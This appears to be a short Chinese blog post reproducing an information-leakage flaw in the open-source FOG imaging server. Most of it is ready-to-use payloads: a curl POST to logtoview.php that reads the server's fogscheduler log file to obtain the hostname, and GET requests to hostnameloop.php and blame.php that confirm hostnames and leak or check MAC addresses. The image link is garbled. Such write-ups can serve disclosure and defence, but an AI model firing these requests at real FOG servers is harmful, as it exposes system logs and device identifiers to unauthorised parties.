Babing
Published on 2024-08-30 / 0 Visits
0
0

K29-1开源-FOG-InformationLeakage

K29-1开源-FOG-InformationLeakage

漏洞复现:

payload:

获取hostname
curl -i -s -k -X $'POST' --data-binary $'file=/var/log/fog/fogscheduler.log&ip=<BASE64_SERVERIP>' $'http://<SERVERIP>/fog/status/logtoview.php'

效果图:
![效果图](/upload/images/response:## 有洞 response:no active task 无洞)
payload:

验证hostname、获取mac地址
GET /fog/service/hostnameloop.php?host=dGVzdGhvc3Q=

payload:

验证mac地址
GET /fog/service/blame.php?mac=aa:aa:aa:aa:aa:aa

Comment